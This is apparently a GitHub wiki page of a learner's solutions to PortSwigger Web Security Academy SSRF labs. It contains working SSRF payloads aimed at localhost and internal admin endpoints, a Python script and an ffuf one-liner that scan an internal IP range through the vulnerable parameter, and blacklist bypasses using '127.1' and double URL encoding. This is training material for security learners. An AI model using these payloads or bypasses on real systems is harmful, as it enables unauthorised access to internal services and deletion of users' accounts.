Server side request forgery (SSRF) - gachikuku/portswigger GitHub Wiki

Apprentice lab: lab:
Basic SSRF against the local server

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

  • Solution

    1. Browse the site, and look for the Check stock functionality on a product.
    2. Intercept Check stock
    3. In the Request make the stockApi equal to http://localhost (URL encode it ⌘ U) and foward.
    4. Notice we get an Admin panel in the Response. /admin endpoint has been accesed.
    5. Attempting to delete carlos reveals /admin/delete?username=carlos
    6. Intercept Check stoke and make stockApi equal to http://localhost/admin/delete?username=carlos delivering a SSRF attack.

Apprentice lab: lab:
Basic SSRF against another back-end system

This lab has a stock check feature which fetches data from an internal system. To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

  • Solution

    1. Create a python virual environment
    1. python3 -m venv .
2. source bin/activate
    1. Scan the internal 192.168.0.X range for an admin interface on port 8080 (use python script below).
    import requests

# Base configuration
url = "https://uuid.web-security-academy.net/product/stock"
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Cookie": "session=7bX4Nrzi0Q27kyqGvWqlQYzqhTc8WB7h",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Dest": "empty",
    "Accept": "*/*",
    "Origin": "https://uuid.web-security-academy.net",
    "Referer": "https://uuid.web-security-academy.net/product?productId=4",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-GB,en-US;q=0.9,en;q=0.8"
}

# Function to send requests
def scan_ip(ip):
    data = f"stockApi=http://{ip}:8080/admin"
    response = requests.post(url, headers=headers, data=data, verify=False)
    if response.status_code == 200:
        print(f"Connected to admin interface at {ip}:8080")
        print("--------------------------------------------------------------------------------------")
    else:
        print(f"No admin interface at {ip}:8080")

# Main scanning loop
for i in range(1, 255):
    ip_address = f"192.168.0.{i}"
    scan_ip(ip_address)

    1. Intercept Check stock functionality, and change the stockApi to the internal IP Address with the /admin endpoint.

    2. Observe the endpoint for deleting users.

    3. Set the stockApi equal to http://192.168.0.82:8080/admin/delete?username=carlos encoded.

    4. Deactivate (optional) the python virtual environment.

    deactivate

    NOTE:
    heres a one liner LOLOLOL 

    ffuf -w ips.txt:IP -u https://uuid.web-security-academy.net/product/stock -d "stockApi=http://IP:8080/admin" -fc 500

    ips.txt is a custom wordlist for ip addresses.

Practitioner lab:
SSRF with blacklist-based input filter

  • Solution

    1. Check an item and for stock.
    2. Change stock to 127.0.0.1, it's blocked but 127.1 its not
    3. /admin it's blocked but using double url encoding %2561dmin it's not blocked. 
      from chepy import Chepy

result = (
    Chepy("%a")
    .to_base16()
    .o
)
    4. Delete carlos

NOTE
Double url encoding is same as base16 encoding

Practitioner lab:
SSRF with filter bypass via open redirection vulnerability
  • Solution visit this

blind

Practitioner lab:
Blind SSRF with out-of-band detection (Pro)

Practitioner lab:
Blind SSRF with Shellshock exploitation (Pro)

Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite

⚠️ **GitHub.com Fallback** ⚠️